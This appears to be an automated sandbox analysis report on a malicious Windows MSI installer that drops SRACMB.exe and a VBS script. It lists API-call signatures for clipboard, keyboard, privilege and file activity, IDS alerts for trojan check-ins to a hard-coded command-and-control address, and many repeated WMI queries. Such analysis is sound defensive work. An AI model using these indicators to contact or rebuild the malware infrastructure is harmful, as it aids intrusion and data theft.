Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000FFD47 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000CDD92 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf

              Networking

Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49869 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49817 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49929 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49977 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49984 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49976 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49982 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49979 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49985 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49981 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49980 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49983 -> 172.111.138.100:5552
Source: Joe Sandbox View | IP Address: 172.111.138.100
Source: Joe Sandbox View | ASN Name: VOXILITYGB
Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100 (50 occurrences; the C2 address is hard-coded, no name resolution precedes the connections)
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0037550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,3_2_0037550C
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00377099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,3_2_00377099
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00377294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_00377294
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_00107294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,8_2_00107294
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00364342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,3_2_00364342
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0038F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_0038F5D0
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0011F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,8_2_0011F5D0

              System Summary

              Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
              Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_003229C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,3_2_003229C2
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_003902AA NtdllDialogWndProc_W,3_2_003902AA
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0038E769 NtdllDialogWndProc_W,CallWindowProcW,3_2_0038E769
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0038EA4E NtdllDialogWndProc_W,3_2_0038EA4E
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0038EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,3_2_0038EAA6
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0038ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,3_2_0038ECBC
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0033AC99 NtdllDialogWndProc_W,3_2_0033AC99
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0033AD5C NtdllDialogWndProc_W,74BFC8D0,NtdllDialogWndProc_W,3_2_0033AD5C
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0033AFB4 GetParent,NtdllDialogWndProc_W,3_2_0033AFB4
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0038EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,3_2_0038EFA8
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0038F0A1 SendMessageW,NtdllDialogWndProc_W,3_2_0038F0A1
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0038F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,3_2_0038F122
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0038F37C NtdllDialogWndProc_W,3_2_0038F37C
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0038F3AB NtdllDialogWndProc_W,3_2_0038F3AB
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0038F3DA NtdllDialogWndProc_W,3_2_0038F3DA
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0038F425 NtdllDialogWndProc_W,3_2_0038F425
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0038F45A ClientToScreen,NtdllDialogWndProc_W,3_2_0038F45A
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0038F594 GetWindowLongW,NtdllDialogWndProc_W,3_2_0038F594
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0038F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_0038F5D0
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0033B7F2 NtdllDialogWndProc_W,3_2_0033B7F2
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0033B845 NtdllDialogWndProc_W,3_2_0033B845
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0038FE80 NtdllDialogWndProc_W,3_2_0038FE80
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0038FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,3_2_0038FF04
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0038FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,3_2_0038FF91
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000B29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,8_2_000B29C2
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_001202AA NtdllDialogWndProc_W,8_2_001202AA
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0011E769 NtdllDialogWndProc_W,CallWindowProcW,8_2_0011E769
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0011EA4E NtdllDialogWndProc_W,8_2_0011EA4E
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0011EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,8_2_0011EAA6
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000CAC99 NtdllDialogWndProc_W,8_2_000CAC99
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0011ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,8_2_0011ECBC
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000CAD5C NtdllDialogWndProc_W,74BFC8D0,NtdllDialogWndProc_W,8_2_000CAD5C
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000CAFB4 GetParent,NtdllDialogWndProc_W,8_2_000CAFB4
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0011EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,8_2_0011EFA8
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0011F0A1 SendMessageW,NtdllDialogWndProc_W,8_2_0011F0A1
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0011F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,8_2_0011F122
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0011F37C NtdllDialogWndProc_W,8_2_0011F37C
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0011F3AB NtdllDialogWndProc_W,8_2_0011F3AB
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0011F3DA NtdllDialogWndProc_W,8_2_0011F3DA
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0011F425 NtdllDialogWndProc_W,8_2_0011F425
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0011F45A ClientToScreen,NtdllDialogWndProc_W,8_2_0011F45A
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0011F594 GetWindowLongW,NtdllDialogWndProc_W,8_2_0011F594
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0011F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,8_2_0011F5D0
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000CB7F2 NtdllDialogWndProc_W,8_2_000CB7F2
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000CB845 NtdllDialogWndProc_W,8_2_000CB845
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0011FE80 NtdllDialogWndProc_W,8_2_0011FE80
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0011FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,8_2_0011FF04
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_0011FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,8_2_0011FF91
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0036702F: CreateFileW,DeviceIoControl,CloseHandle,3_2_0036702F
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0035B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74285590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,3_2_0035B9F1
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_003682D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,3_2_003682D0
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000F82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,8_2_000F82D0
              Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\6e47fe.msi
              Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\inprogressinstallinfo.ipi
              Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\SourceHash{29EF7317-DCA1-4159-97B2-C883AD400AC6}
              Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI4908.tmp
              Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI4976.tmp
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: String function: 000D7750 appears 42 times
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: String function: 000CF885 appears 68 times
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: String function: 00347750 appears 42 times
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: String function: 0033F885 appears 68 times
              Source: classification engine | Classification label: mal100.troj.evad.winMSI@17/14@0/1
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0036D712 GetLastError,FormatMessageW,3_2_0036D712
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0035B8B0 AdjustTokenPrivileges,CloseHandle,3_2_0035B8B0
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0035BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,3_2_0035BEC3
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000EB8B0 AdjustTokenPrivileges,CloseHandle,8_2_000EB8B0
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe | Code function: 8_2_000EBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,8_2_000EBEC3
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0036EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,3_2_0036EA85
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_00366F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,3_2_00366F5B
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_0036EFCD CoInitialize,CoCreateInstance,CoUninitialize,3_2_0036EFCD
              Source: C:\Windows\Installer\MSI4976.tmp | Code function: 3_2_003231F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,3_2_003231F2
              Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\CML4966.tmp
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
              Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\TEMP\~DFF2FF7337FADF7859.TMP
              Source: C:\Windows\Installer\MSI4976.tmp | Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs
              Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
